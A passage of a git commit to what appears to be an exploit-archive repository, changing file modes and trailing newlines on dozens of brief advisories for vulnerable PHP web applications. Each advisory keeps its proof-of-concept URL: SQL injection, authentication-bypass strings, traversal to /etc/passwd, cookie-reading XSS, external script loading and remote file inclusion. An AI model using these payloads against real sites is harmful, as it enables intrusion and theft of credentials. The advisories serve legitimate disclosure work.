mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26725.txt b/platforms/php/webapps/26725.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26726.txt b/platforms/php/webapps/26726.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26727.txt b/platforms/php/webapps/26727.txt old mode 100755 new mode 100644 index 044d7e84b..83fc2725a --- a/platforms/php/webapps/26727.txt +++ b/platforms/php/webapps/26727.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 5 and prior are vulnerable; other versions may also be affected. -http://www.example.com/fq.php?A=ViewFQ&cid=1[SQL] \ No newline at end of file +http://www.example.com/fq.php?A=ViewFQ&cid=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26728.txt b/platforms/php/webapps/26728.txt old mode 100755 new mode 100644 index bd7b459dc..cde61597d --- a/platforms/php/webapps/26728.txt +++ b/platforms/php/webapps/26728.txt @@ -4,4 +4,4 @@ Portal Solutions is prone to an SQL injection vulnerability. This issue is due t Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/comentarii.php?idp=[SQL] \ No newline at end of file +http://www.example.com/comentarii.php?idp=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26729.txt b/platforms/php/webapps/26729.txt old mode 100755 new mode 100644 index f06f8ba5d..87a27cea8 --- a/platforms/php/webapps/26729.txt +++ b/platforms/php/webapps/26729.txt @@ -4,4 +4,4 @@ Affiliate Manager PRO is prone to an SQL injection vulnerability. These issues a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/functions.php?action=ViewPaymentLog&pid=[SQL] \ No newline at end of file +http://www.example.com/functions.php?action=ViewPaymentLog&pid=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2673.txt b/platforms/php/webapps/2673.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26730.txt b/platforms/php/webapps/26730.txt old mode 100755 new mode 100644 index 38bede68e..9b63e1bfe --- a/platforms/php/webapps/26730.txt +++ b/platforms/php/webapps/26730.txt @@ -4,4 +4,4 @@ Portal Solutions is prone to a directory traversal vulnerability. This is due to This issue may be leveraged to read arbitrary files on an affected computer with the privileges of the Web server. An attacker can employ directory traversal sequences to disclose arbitrary files. -http://www.example.com/arhiva.php?dir=../ \ No newline at end of file +http://www.example.com/arhiva.php?dir=../ \ No newline at end of file diff --git a/platforms/php/webapps/26731.txt b/platforms/php/webapps/26731.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26732.txt b/platforms/php/webapps/26732.txt old mode 100755 new mode 100644 index 3f475e6bd..4a79fa0f6 --- a/platforms/php/webapps/26732.txt +++ b/platforms/php/webapps/26732.txt @@ -4,4 +4,4 @@ Trac is prone to an SQL injection vulnerability. This issue is due to a failure Successful exploitation could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. -http://www.example.com/trac/search?q=test\' \ No newline at end of file +http://www.example.com/trac/search?q=test\' \ No newline at end of file diff --git a/platforms/php/webapps/26734.txt b/platforms/php/webapps/26734.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26735.txt b/platforms/php/webapps/26735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/2674.php b/platforms/php/webapps/2674.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26748.txt b/platforms/php/webapps/26748.txt old mode 100755 new mode 100644 index 3dd95b934..acd53de9b --- a/platforms/php/webapps/26748.txt +++ b/platforms/php/webapps/26748.txt @@ -4,4 +4,4 @@ DoceboLMS is prone to a directory traversal vulnerability. This issue is due to An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible. -http://www.example.com/addons/fckeditor2rc2/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder= \ No newline at end of file +http://www.example.com/addons/fckeditor2rc2/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder= \ No newline at end of file diff --git a/platforms/php/webapps/2675.asp b/platforms/php/webapps/2675.asp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26750.txt b/platforms/php/webapps/26750.txt old mode 100755 new mode 100644 index 5006ebcd5..553468bcf --- a/platforms/php/webapps/26750.txt +++ b/platforms/php/webapps/26750.txt @@ -8,4 +8,4 @@ http://www.example.com/index.php?categoryid=[SQL] http://www.example.com/index.php?entryid=[SQL] http://www.example.com/index.php?month=1&year=[SQL] http://www.example.com/index.php?month=[SQL] -http://www.example.com/index.php?year=2005&month=12&day=[SQL] \ No newline at end of file +http://www.example.com/index.php?year=2005&month=12&day=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26751.txt b/platforms/php/webapps/26751.txt old mode 100755 new mode 100644 index a4c8dc1e9..492c16dcd --- a/platforms/php/webapps/26751.txt +++ b/platforms/php/webapps/26751.txt @@ -7,4 +7,4 @@ Successful exploitation could result in a compromise of the application, disclos Versions 1.1 and earlier are vulnerable; other versions may also be affected. http://www.example.com/index.php?page=[SQL] -http://www.example.com/index.php?page=en_Home&car=[SQL] \ No newline at end of file +http://www.example.com/index.php?page=en_Home&car=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26755.txt b/platforms/php/webapps/26755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26756.txt b/platforms/php/webapps/26756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26757.txt b/platforms/php/webapps/26757.txt old mode 100755 new mode 100644 index 8bb950263..4b646e128 --- a/platforms/php/webapps/26757.txt +++ b/platforms/php/webapps/26757.txt @@ -8,4 +8,4 @@ A remote attacker may inject SQL, HTML and script code resulting in theft of coo Version 3 beta 2.8 is vulnerable; other versions may be affected. -http://www.example.com/thwb/misc.php?action=getlastpost&userid='[SQL] \ No newline at end of file +http://www.example.com/thwb/misc.php?action=getlastpost&userid='[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26758.txt b/platforms/php/webapps/26758.txt old mode 100755 new mode 100644 index 3b7720211..4552aee62 --- a/platforms/php/webapps/26758.txt +++ b/platforms/php/webapps/26758.txt @@ -4,4 +4,4 @@ DRZES HMS is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/customers/login.php?customerEmailAddress=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/customers/login.php?customerEmailAddress=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/2677.asp b/platforms/php/webapps/2677.asp old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26770.txt b/platforms/php/webapps/26770.txt old mode 100755 new mode 100644 index 7ee9b12ab..917cfdd76 --- a/platforms/php/webapps/26770.txt +++ b/platforms/php/webapps/26770.txt @@ -5,4 +5,4 @@ MilliScripts is prone to a cross-site scripting vulnerability. This is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/red_14/register.php?do=register2&domainname=%22%3E%3Cs -cript%20src=www.example.com/script.js%3E%3C/script%3E&ext=www.example.com \ No newline at end of file +cript%20src=www.example.com/script.js%3E%3C/script%3E&ext=www.example.com \ No newline at end of file diff --git a/platforms/php/webapps/2678.txt b/platforms/php/webapps/2678.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26780.txt b/platforms/php/webapps/26780.txt old mode 100755 new mode 100644 index 5734debbe..cbc7bb2c5 --- a/platforms/php/webapps/26780.txt +++ b/platforms/php/webapps/26780.txt @@ -4,4 +4,4 @@ Scout Portal Toolkit is prone to multiple input-validation vulnerabilities becau A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Other attacks are also possible. -http://www.example.com/Projects/SPT/demo/SPT--QuickSearch.php?ss=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/Projects/SPT/demo/SPT--QuickSearch.php?ss=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26781.txt b/platforms/php/webapps/26781.txt old mode 100755 new mode 100644 index 256dbb119..498aa725b --- a/platforms/php/webapps/26781.txt +++ b/platforms/php/webapps/26781.txt @@ -4,4 +4,4 @@ Scout Portal Toolkit is prone to multiple input-validation vulnerabilities becau A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Other attacks are also possible. -http://www.example.com/Projects/SPT/demo/SPT--BrowseResources.php?ParentId=<script>alert(document.cookie)</script> \ No newline at end of file +http://www.example.com/Projects/SPT/demo/SPT--BrowseResources.php?ParentId=<script>alert(document.cookie)</script> \ No newline at end of file diff --git a/platforms/php/webapps/26782.txt b/platforms/php/webapps/26782.txt old mode 100755 new mode 100644 index 622e3c126..47593db0b --- a/platforms/php/webapps/26782.txt +++ b/platforms/php/webapps/26782.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce http://www.example.com/Projects/SPT/demo/SPT--Advanced.php -Input: <script>alert(document.cookie)</script> on all fields.. \ No newline at end of file +Input: <script>alert(document.cookie)</script> on all fields.. \ No newline at end of file diff --git a/platforms/php/webapps/26783.txt b/platforms/php/webapps/26783.txt old mode 100755 new mode 100644 index 86370fdfa..b268ff949 --- a/platforms/php/webapps/26783.txt +++ b/platforms/php/webapps/26783.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce http://www.example.com/Projects/SPT/demo/SPT--UserLogin.php Input username >> ' -Input password >> ' \ No newline at end of file +Input password >> ' \ No newline at end of file diff --git a/platforms/php/webapps/26784.txt b/platforms/php/webapps/26784.txt old mode 100755 new mode 100644 index 3d8c4e306..4c1067028 --- a/platforms/php/webapps/26784.txt +++ b/platforms/php/webapps/26784.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos The following proof of concept is available: Username : 'or''=' -Password : 'or''=' \ No newline at end of file +Password : 'or''=' \ No newline at end of file diff --git a/platforms/php/webapps/26785.txt b/platforms/php/webapps/26785.txt old mode 100755 new mode 100644 index 08d0a01e9..442dcb7de --- a/platforms/php/webapps/26785.txt +++ b/platforms/php/webapps/26785.txt @@ -5,4 +5,4 @@ Arab Portal is prone to multiple SQL injection vulnerabilities. These are due to Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. http://www.example.com/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&', -'010','Hacker','0')/* \ No newline at end of file +'010','Hacker','0')/* \ No newline at end of file diff --git a/platforms/php/webapps/26787.txt b/platforms/php/webapps/26787.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26788.txt b/platforms/php/webapps/26788.txt old mode 100755 new mode 100644 index dd8a457ed..f7747f7aa --- a/platforms/php/webapps/26788.txt +++ b/platforms/php/webapps/26788.txt @@ -7,4 +7,4 @@ An attacker can exploit this issue to include arbitrary remote PHP code and exec Successful exploitation may lead to a compromise of the underlying system; other attacks are also possible. http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../etc/passwd%00 -http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00 \ No newline at end of file +http://www.example.com/config.php?_CCFG[_PKG_PATH_DBSE]=../../../../../../../../script.php%00 \ No newline at end of file diff --git a/platforms/php/webapps/26789.txt b/platforms/php/webapps/26789.txt old mode 100755 new mode 100644 index ffe921835..cb6457bf5 --- a/platforms/php/webapps/26789.txt +++ b/platforms/php/webapps/26789.txt @@ -4,4 +4,4 @@ EncapsGallery is prone to an SQL injection vulnerability. This issue is due to a Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/gallery.php?page=foto&action=show_custom&id=[SQL] \ No newline at end of file +http://www.example.com/gallery.php?page=foto&action=show_custom&id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2679.txt b/platforms/php/webapps/2679.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26790.txt b/platforms/php/webapps/26790.txt old mode 100755 new mode 100644 index 7de2e7a4f..b7cb6c71f --- a/platforms/php/webapps/26790.txt +++ b/platforms/php/webapps/26790.txt @@ -6,4 +6,4 @@ A successful exploit could allow an attacker to compromise the application, acce http://www.example.com/comments.php?keyword=&author=&cat=0&since=[SQL] http://www.example.com/comments.php?keyword=&author=&cat=0&since=1&sort_by=[SQL] -http://www.example.com/comments.php?keyword=&author=&cat=0&since=1&sort_by=date&sort_order=descending&items_number=[SQL] \ No newline at end of file +http://www.example.com/comments.php?keyword=&author=&cat=0&since=1&sort_by=date&sort_order=descending&items_number=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26791.txt b/platforms/php/webapps/26791.txt old mode 100755 new mode 100644 index 2c7ab6779..b2e404af3 --- a/platforms/php/webapps/26791.txt +++ b/platforms/php/webapps/26791.txt @@ -4,4 +4,4 @@ PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the app A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/category.php?cat=search&search=[SQL] \ No newline at end of file +http://www.example.com/category.php?cat=search&search=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26792.txt b/platforms/php/webapps/26792.txt old mode 100755 new mode 100644 index b56256dab..991ccf2d4 --- a/platforms/php/webapps/26792.txt +++ b/platforms/php/webapps/26792.txt @@ -4,4 +4,4 @@ PhpWebGallery is prone to multiple SQL-injection vulnerabilities because the app A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/picture.php?cat=best_rated&image_id=[SQL] \ No newline at end of file +http://www.example.com/picture.php?cat=best_rated&image_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26793.txt b/platforms/php/webapps/26793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26794.txt b/platforms/php/webapps/26794.txt old mode 100755 new mode 100644 index daa515bb0..7d710bdd2 --- a/platforms/php/webapps/26794.txt +++ b/platforms/php/webapps/26794.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of http://www.example.com/index.php?level=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E -http://www.example.com/index.php?level=search&searchterms=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/index.php?level=search&searchterms=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26795.txt b/platforms/php/webapps/26795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26796.txt b/platforms/php/webapps/26796.txt old mode 100755 new mode 100644 index 1de0c3a1e..877da7662 --- a/platforms/php/webapps/26796.txt +++ b/platforms/php/webapps/26796.txt @@ -4,4 +4,4 @@ VCD-db is prone to multiple input validation vulnerabilities. These issues are d Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. -http://www.example.com/?page=category&category_id=1&viewmode=img&batch=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/?page=category&category_id=1&viewmode=img&batch=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26797.txt b/platforms/php/webapps/26797.txt old mode 100755 new mode 100644 index 2fdf9f7e8..00953d4e6 --- a/platforms/php/webapps/26797.txt +++ b/platforms/php/webapps/26797.txt @@ -4,4 +4,4 @@ PHP JackKnife is prone to a cross-site scripting vulnerability. This issue is du An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=292&sKeywords=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/Search/DisplayResults.php?DOMAIN_Link=&iSearchID=292&sKeywords=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/26798.txt b/platforms/php/webapps/26798.txt old mode 100755 new mode 100644 index f97d14ed5..07f8df624 --- a/platforms/php/webapps/26798.txt +++ b/platforms/php/webapps/26798.txt @@ -4,4 +4,4 @@ Mantis is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/view_filters_page.php?for_screen=1&target_field=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/view_filters_page.php?for_screen=1&target_field=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26799.txt b/platforms/php/webapps/26799.txt old mode 100755 new mode 100644 index 044f0a9ba..fed238fc0 --- a/platforms/php/webapps/26799.txt +++ b/platforms/php/webapps/26799.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could allow an attacker to comp Snipe Gallery versions 3.1.4 and prior are vulnerable; other versions may also be affected. -http://www.example.com/view.php?gallery_id=[SQL] \ No newline at end of file +http://www.example.com/view.php?gallery_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26800.txt b/platforms/php/webapps/26800.txt old mode 100755 new mode 100644 index a971f6703..abfcf2d36 --- a/platforms/php/webapps/26800.txt +++ b/platforms/php/webapps/26800.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could allow an attacker to comp Snipe Gallery versions 3.1.4 and prior are vulnerable; other versions may also be affected. -http://www.example.com/image.php?page=1&gallery_id=1&image_id=[SQL] \ No newline at end of file +http://www.example.com/image.php?page=1&gallery_id=1&image_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26801.txt b/platforms/php/webapps/26801.txt old mode 100755 new mode 100644 index e9c7122b0..935400c34 --- a/platforms/php/webapps/26801.txt +++ b/platforms/php/webapps/26801.txt @@ -7,4 +7,4 @@ Successful exploitation of these vulnerabilities could allow an attacker to comp Snipe Gallery versions 3.1.4 and prior are vulnerable; other versions may also be affected. http://www.example.com/search.php?keyword=%22%3E%3Cscript%3Ealert%28% -27r0t%27%29%3C%2Fscript%3E&search_cat=&search_type=and \ No newline at end of file +27r0t%27%29%3C%2Fscript%3E&search_cat=&search_type=and \ No newline at end of file diff --git a/platforms/php/webapps/26804.txt b/platforms/php/webapps/26804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26808.txt b/platforms/php/webapps/26808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26809.txt b/platforms/php/webapps/26809.txt old mode 100755 new mode 100644 index 0bf360571..f99079572 --- a/platforms/php/webapps/26809.txt +++ b/platforms/php/webapps/26809.txt @@ -7,4 +7,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of http://www.example.com/show.php?start=0&id=[SQL] http://www.example.com/show.php?start=[SQL] http://www.example.com/show.php?rand=1&id=[SQL] -http://www.example.com/show.php?rand=[SQL] \ No newline at end of file +http://www.example.com/show.php?rand=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/2681.txt b/platforms/php/webapps/2681.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26810.txt b/platforms/php/webapps/26810.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26812.txt b/platforms/php/webapps/26812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26813.txt b/platforms/php/webapps/26813.txt old mode 100755 new mode 100644 index 041cf3e64..c8a4b6cc6 --- a/platforms/php/webapps/26813.txt +++ b/platforms/php/webapps/26813.txt @@ -4,4 +4,4 @@ Job Board is prone to an SQL injection vulnerability. This issue is due to a fai Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/index.php?cat=[SQL] \ No newline at end of file +http://www.example.com/index.php?cat=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26814.txt b/platforms/php/webapps/26814.txt old mode 100755 new mode 100644 index 1eaf4c785..84807b6c0 --- a/platforms/php/webapps/26814.txt +++ b/platforms/php/webapps/26814.txt @@ -4,4 +4,4 @@ Dream Poll is prone to an SQL injection vulnerability. This issue is due to a fa Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. -http://www.example.com/view_Results.php?id=[SQL] \ No newline at end of file +http://www.example.com/view_Results.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26815.txt b/platforms/php/webapps/26815.txt old mode 100755 new mode 100644 index c1816b712..5d7b0ef0e --- a/platforms/php/webapps/26815.txt +++ b/platforms/php/webapps/26815.txt @@ -5,4 +5,4 @@ ProjectForum is prone to multiple cross-site scripting vulnerabilities. These is An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/admin/adminsignin.html?fwd=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E -http://www.example.com/support/admin/newpage.html?originalpageid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file +http://www.example.com/support/admin/newpage.html?originalpageid=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/26817.txt b/platforms/php/webapps/26817.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26818.txt b/platforms/php/webapps/26818.txt old mode 100755 new mode 100644 index a894b2047..aac6a6d40 --- a/platforms/php/webapps/26818.txt +++ b/platforms/php/webapps/26818.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of http://www.example.com/[envo]/modules.php?op=modload&name=News&file=index&catid=&topic=18&startrow=[xss] -http://www.example.com/[envo]/modules.php?op=modload&name=News&file=index&catid=[xss] \ No newline at end of file +http://www.example.com/[envo]/modules.php?op=modload&name=News&file=index&catid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/26819.txt b/platforms/php/webapps/26819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26824.txt b/platforms/php/webapps/26824.txt old mode 100755 new mode 100644 index c164de498..cef049b48 --- a/platforms/php/webapps/26824.txt +++ b/platforms/php/webapps/26824.txt @@ -4,4 +4,4 @@ WikkaWiki is prone to a cross-site scripting vulnerability. This issue is due to An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/TextSearch?phrase=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/TextSearch?phrase=%22%3E%3Cscript%3Ealert%28%27r0t%27%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/26826.txt b/platforms/php/webapps/26826.txt old mode 100755 new mode 100644 index 036b580ab..74d3a7dcd --- a/platforms/php/webapps/26826.txt +++ b/platforms/php/webapps/26826.txt @@ -4,4 +4,4 @@ Netref is prone to an SQL-injection vulnerability because the application fails A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/pro/page/index.php?cat=[Sql Injection] \ No newline at end of file +http://www.example.com/pro/page/index.php?cat=[Sql Injection] \ No newline at end of file diff --git a/platforms/php/webapps/26827.txt b/platforms/php/webapps/26827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26828.txt b/platforms/php/webapps/26828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26829.txt b/platforms/php/webapps/26829.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26830.txt b/platforms/php/webapps/26830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26831.txt b/platforms/php/webapps/26831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26832.txt b/platforms/php/webapps/26832.txt old mode 100755 new mode 100644 index 5b710ead2..78f8a0775 --- a/platforms/php/webapps/26832.txt +++ b/platforms/php/webapps/26832.txt @@ -4,4 +4,4 @@ QuickPayPro is prone to multiple input validation vulnerabilities. These issues Successful exploitation of these vulnerabilities could result in a compromise of the application, disclosure or modification of data, the theft of cookie-based authentication credentials. They may also permit an attacker to exploit vulnerabilities in the underlying database implementation as well as other attacks. -http://www.example.com/mycompany/sales.view.php?customerid=1[SQL] \ No newline at end of file +http://www.example.com/mycompany/sales.view.php?customerid=1[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26836.txt b/platforms/php/webapps/26836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26837.txt b/platforms/php/webapps/26837.txt old mode 100755 new mode 100644 index 9002f9ef4..e58b479a7 --- a/platforms/php/webapps/26837.txt +++ b/platforms/php/webapps/26837.txt @@ -4,4 +4,4 @@ Limbo CMS is prone to multiple input validation vulnerabilities. These issues ca Limbo CMS versions 1.0.4.2 and prior are affected by these vulnerabilities. -http://www.example.com/[path_to_limbo]/index2.php?option=frontpage/../../../../../../../../../../../script \ No newline at end of file +http://www.example.com/[path_to_limbo]/index2.php?option=frontpage/../../../../../../../../../../../script \ No newline at end of file diff --git a/platforms/php/webapps/26838.txt b/platforms/php/webapps/26838.txt old mode 100755 new mode 100644 index fe0cf4361..1489a68f3 --- a/platforms/php/webapps/26838.txt +++ b/platforms/php/webapps/26838.txt @@ -6,4 +6,4 @@ E-commerce is prone to a cross-site scripting vulnerability. This issue is due t An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. http://www.example.com/index.php?page=">[XSS] -http://www.example.com/?page=">[XSS] \ No newline at end of file +http://www.example.com/?page=">[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/26839.txt b/platforms/php/webapps/26839.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26840.txt b/platforms/php/webapps/26840.txt old mode 100755 new mode 100644 index d79bec60a..6252c1a88 --- a/platforms/php/webapps/26840.txt +++ b/platforms/php/webapps/26840.txt @@ -6,4 +6,4 @@ Successful exploitation of these vulnerabilities could result in a compromise of TML CMS 0.5 is reportedly affected. Other versions may be vulnerable as well. -http://www.example.com/[ztml]/index.php?doc=unote&id=[sql] \ No newline at end of file +http://www.example.com/[ztml]/index.php?doc=unote&id=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/26841.txt b/platforms/php/webapps/26841.txt old mode 100755 new mode 100644 index 94ae3eaa5..319d98140 --- a/platforms/php/webapps/26841.txt +++ b/platforms/php/webapps/26841.txt @@ -5,4 +5,4 @@ E-commerce is prone to a remote file include vulnerability. This issue is due to An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the Web server process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. http://www.example.com/index.php?page=http://www.example.com/?&cmd= -http://www.example.com/?page=http://www.example.com/?&cmd= \ No newline at end of file +http://www.example.com/?page=http://www.example.com/?&cmd= \ No newline at end of file diff --git a/platforms/php/webapps/26844.txt b/platforms/php/webapps/26844.txt old mode 100755 new mode 100644 index 1787c80f7..c6335e05b --- a/platforms/php/webapps/26844.txt +++ b/platforms/php/webapps/26844.txt @@ -4,4 +4,4 @@ DCForum is prone to a cross-site scripting vulnerability. This issue is due to a An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -/dcboard.php?az=show_topic&forum=46&topic_id=2215&mesg_id=2215&page=[XSS] \ No newline at end of file +/dcboard.php?az=show_topic&forum=46&topic_id=2215&mesg_id=2215&page=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/2685.php b/platforms/php/webapps/2685.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26853.txt b/platforms/php/webapps/26853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/26854.txt b/platforms/php/webapps/26854.txt old mode 100755 new mode 100644 index c431dd737..9eb970fe8 --- a/platforms/php/webapps/26854.txt +++ b/platforms/php/webapps/26854.txt @@ -6,4 +6,4 @@ ezDatabase is prone to an SQL injection vulnerability and a local file include v This issue affects version 2.1.2; other versions may also be affected. -http://www.example.com/index.php?p=getcat&db_id=[SQL] \ No newline at end of file +http://www.example.com/index.php?p=getcat&db_id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26855.txt b/platforms/php/webapps/26855.txt old mode 100755 new mode 100644 index 0e975270c..f9b045cb7 --- a/platforms/php/webapps/26855.txt +++ b/platforms/php/webapps/26855.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, disclos http://www.example.com/browse.ihtml?step=4&store=42&id=[SQL] http://www.example.com/browse.ihtml?step=4&store=1[SQL] -http://www.example.com/browse.ihtml?step=[SQL] \ No newline at end of file +http://www.example.com/browse.ihtml?step=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/26856.txt b/platforms/php/webapps/26856.txt old mode 100755 new mode 100644 index 9a1f76584..a36a63f69 --- a/platforms/php/webapps/26856.txt +++ b/platforms/php/webapps/26856.txt @@ -6,4 +6,4 @@ Successful exploitation could result in a compromise of the application, 